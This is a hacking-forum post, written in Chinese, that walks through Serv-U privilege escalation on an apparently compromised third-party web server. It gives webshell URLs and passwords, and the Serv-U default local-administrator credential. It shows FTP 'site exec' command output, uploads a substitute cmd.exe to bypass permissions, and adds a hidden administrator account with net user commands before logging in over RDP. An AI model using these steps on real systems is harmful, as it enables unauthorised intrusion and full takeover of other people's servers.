黑帽联盟

标题: Serv-U提权实例测试演示 [打印本页]
作者: admin    时间: 2016-10-14 16:56
标题: Serv-U提权实例测试演示
Shell:http://www.案例/manage/Databackup/error.asp
Pass:123321111
如图:
12.png

看了一下服务器基本信息,得到以下信息:
支持aspx,不支持php,Wscript.Shell不可用
127.0.0.1:21.........关闭
127.0.0.1:1433.........开放
127.0.0.1:3389.........开放
127.0.0.1:43958.........开放
远程桌面可以连接

磁盘目录限制不是很严格,C盘根目录都可以直接浏览,如图:
13.png

从上边得到的信息中可以发现,服务器开放1433端口,那么是开放了MSSQL服务的,如果这台服务器的MSSQL存在弱口令,我们也可以利用MSSQLl来提取,但是这里我测试过之后发现,这里的MSSQL不存在弱口令。
服务器也开放了43958端口,这是Serv-U特定会开放的端口,看到这个端口,那就说明服务器上装了Serv-U软件,我们或许可以通过这一点来提权。
对于Serv-U提权来说,aspx的脚本和php的脚本提权的成功率还是蛮高的,asp的提权脚本成功率很低,所以我这里就不用这个asp的web了,我再传一个aspx的shell上去,这个服务器是支持aspx的。
上传完毕的aspx的web的地址是:
http://www.案例/manage/Databackup/drvfan.aspx
密码是:
NI610B

登陆后,直接切换到SU的提权界面:
14.png
15.png

什么都不用改,直接单击“Exploit”按钮开始执行,回显如图:
16.png
17.png

在回显中的这么几句:
220 Serv-U FTP Server v6.3 for WinSock ready...
user localadministrator
331 User name okay, need password.
pass #l@$ak#.lk;0@P
230 User logged in, proceed.

可以看到,SU的默认管理密码并没有被修改,我们登陆是成功了的,在后边的这么几句:
220 Serv-U FTP Server v6.3 for WinSock ready...
user bin
331 User name okay, need password.
pass binftp
230 User logged in, proceed.
site exec cmd.exe /c net user
501 Cannot EXEC command line (error=0).
Quit
这里我们的FTP用户是添加成功了的,但是我们执行net user失败了,错误提示是:
Cannot EXEC command line (error=0)
对于这个错误,我觉得应该是因为服务器管理员对cmd.exe做了权限限制,导致我们的web无权调用cmd.exe,进而导致我们这里的命令执行失败。
失败的原因找到了,那么解决办法也就有了。

遇到这种情况,我们可以直接自己传一个cmd.exe上去的,一般我都会传到C:\windows\temp目录下,如图:
18.png
这个cmd.exe就是我传上去的。

好了,现在回到SU提权界面,把我们传上去的cmd.exe的路径填上,如图:
19.png

其他的都不要动,然后再执行,如图:
21.png

看这两句:
site exec c:\windows\temp\cmd.exe /c net user
200 EXEC command successful (TID=33).
可以看到,这次就提示执行成功了。
然后我们把命令改成添加管理员的命令即可,比如这两句:
net user drvfan drv283MLGB!!! /add
net localgroup administrators drvfan /add

如图:

这样直接执行就OK了,执行完毕就在服务器上添加了一个用户名为drvfan,密码为drv283MLGB!!!的管理员,这里的服务器开了3389,直接连上去登陆就行了,如图:
22.png
完毕。





欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/) Powered by Discuz! X2.5